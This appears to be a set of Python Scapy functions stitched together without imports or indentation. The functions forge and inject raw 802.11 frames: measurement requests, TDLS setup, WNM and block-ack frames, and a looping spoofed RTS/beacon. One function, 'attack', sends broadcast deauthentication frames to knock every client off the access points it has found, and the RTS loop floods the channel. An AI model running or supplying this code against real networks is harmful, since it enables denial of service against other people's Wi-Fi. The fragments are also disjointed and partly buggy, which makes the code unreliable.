def send_statistics_req(bssid, src, dst):
global token
subel = "\x01\x10\x01\x00\x00\x00\xff\xff\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00"
length = struct.pack("B", len(subel) + 3 + 6 + 5)
initial = Dot11(type=0, subtype=13, addr1=dst, addr2=src, addr3=bssid, SC=next_sc(), FCfield=0) \
/ ("\x05\x00"+token+"\x00\x01"+"\x26"+length+"\x01\x0e\x07" + dst + "\xff\xff\x00\x00\x00" + subel)
sendp(rt / initial, iface=interface, verbose=False, loop=0)
def send_tdls_disc(bssid, src, dst):
global token
discovery_request = Dot11(type=2, subtype=0, addr1=dst, addr2=src, addr3=bssid, SC=next_sc(), FCfield=0) \
/ LLC(dsap=0xaa, ssap=0xaa, ctrl=0x03) \
/ SNAP(OUI=0x000000, code=0x890d) \
/ ("\x02\x0c\x0a\x01\x65\x12" + bssid + src + dst)
sendp(rt / discovery_request, iface=interface, verbose=False, loop=0)
def send_load_req(bssid, src, dst):
global token
#initial = Dot11(type=0, subtype=13, addr1=dst, addr2=src, addr3=bssid, SC=next_sc(), FCfield=0) \
# / ("\x05\x00" + token + "\x00\x01" +
# "\x26\x09\x01\x0e\x03\x04\x00\xff\xff\x00\x00")
initial = Dot11(type=0, subtype=13, addr1=dst, addr2=src, addr3=bssid, SC=next_sc(), FCfield=0) \
/ ("\x05\x00" + token + "\x00\x01" +
"\x26\x0d\x01\x0e\x03\x04\x00\x00\x00\x64\x00\x01\x02\x01\x00")
sendp(rt / initial, iface=interface, verbose=False, loop=0)
def send_wnm_meas(bssid, src, dst):
global token
meas_wireshark = Dot11(type=0, subtype=13, addr1=dst, addr2=src, addr3=bssid, SC=next_sc(), FCfield=0) \
/ ("\x0a\x19")
meas_standard = Dot11(type=0, subtype=13, addr1=dst, addr2=src, addr3=bssid, SC=next_sc(), FCfield=0) \
/ ("\x0a\x19\x01")
sendp(rt / meas_wireshark, iface=interface, verbose=False, loop=0)
sendp(rt / meas_standard, iface=interface, verbose=False, loop=0)
def send_tdls_setup(bssid, src, dst):
global token
setup_request = Dot11(type=2, subtype=0, addr1=dst, addr2=src, addr3=bssid, SC=next_sc(), FCfield=0) \
/ LLC(dsap=0xaa, ssap=0xaa, ctrl=0x03) \
/ SNAP(OUI=0x000000, code=0x890d) \
/ ("\x02\x0c\x00\x01\xff\xff")
# Dialog token - capabilities - supported rates
sendp(rt / setup_request, iface=interface, verbose=False, loop=0)
def attack(self):
client = "FF:FF:FF:FF:FF:FF"
for i in range(0, len(self.found_APs)-1):
print("Now deauthing all users from " + self.found_APs[1])
ap = self.found_APs[i]
# deauth packet for AP
packet = RadioTap()/Dot11(addr1=client, addr2=ap, addr3=ap) / Dot11Deauth()
#interface must be the monitor one
sendp(packet, iface=self.valueObj.interfaceName, count=self.valueObj.count, inter=0.1 ,verbose=1)
def send_wnm_eventreq(bssid, src, dst):
global token
#subel = "\x01\x02\x04\x01" # Channel Number subelement
subel = "" # Empty subel
values = token + "\x02\x00" + subel
length = struct.pack("B", len(values))
elem = "\x4E" + length + values
tim_wireshark = Dot11(type=0, subtype=13, addr1=dst, addr2=src, addr3=bssid, SC=next_sc(), FCfield=0) \
/ ("\x0a\x00" + elem)
tim_standard = Dot11(type=0, subtype=13, addr1=dst, addr2=src, addr3=bssid, SC=next_sc(), FCfield=0) \
/ ("\x0a\x00" + token + elem)
sendp(rt / tim_wireshark, iface=interface, verbose=False, loop=0)
sendp(rt / tim_standard, iface=interface, verbose=False, loop=0)
def sendRTS(MAC1, MAC2, MAC3):
millis = 615
blob = struct.pack("<H", millis)
millis = struct.unpack(">H", blob)[0]
packet2 = scapy.RadioTap(present="Flags", Flags="FCS")
packet2 /= Dot11FCS(addr1=MAC1,
addr2=MAC2,
addr3=MAC3,
addr4="00:00:00:00:00:00",
subtype=11,
type=1,
ID=millis)
packet2 /= scapy.Dot11Beacon(cap="ESS", timestamp=1)
packet2 /= scapy.Dot11EltRates(rates=[130, 132, 11, 22])
#packet2 /= scapy.Dot11Elt(ID="DSset", info="\x03")
#packet2 /= scapy.Dot11Elt(ID="TIM", info="\x00\x01\x00\x00")
#p = scapy.srp(packet2,iface=monitor_if, timeout=0.1)
sendp(packet2, iface=monitor_if, inter=0.1, loop=1)
def inject(self, pkt, inter=0):
sendp(pkt, iface=self.name, inter=inter, verbose=False)
def send_link_measurement(bssid, src, dst):
global token
initial = Dot11(type=0, subtype=13, addr1=dst, addr2=src, addr3=bssid, SC=next_sc(), FCfield=0) \
/ ("\x05\x02"+token+"\x10\x10")
sendp(rt / initial, iface=interface, verbose=False, loop=0)
def send_frame_req(bssid, src, dst):
global token
initial = Dot11(type=0, subtype=13, addr1=dst, addr2=src, addr3=bssid, SC=next_sc(), FCfield=0) \
/ ("\x05\x00"+token+"\x00\x01"+"\x26\x10\x00\x0e\x06\x04\x00\xff\xff\x00\xff\x01\xff\xff\xff\xff\xff\xff")
sendp(rt / initial, iface=interface, verbose=False, loop=0)
def send_dot11u_ql(bssid, src, dst):
global token
initial = Dot11(type=0, subtype=13, addr1=dst, addr2=src, addr3=bssid, SC=next_sc(), FCfield=0) \
/ ("\x04\x0a" + token + "\x6c\x02\xff\x00\x06\x00\x00\x01\x02\x00\x01\x01")
sendp(rt / initial, iface=interface, verbose=False, loop=0)
def back_req(bssid, src, dst):
global token
sendp(rt / ("\xd0\x00\x3a\x01" + dst + src + bssid + "\xb0\xb0\x03\x00\x69\x02\x10\x00\x00\x60\xcd"), iface=interface, verbose=False, loop=0)
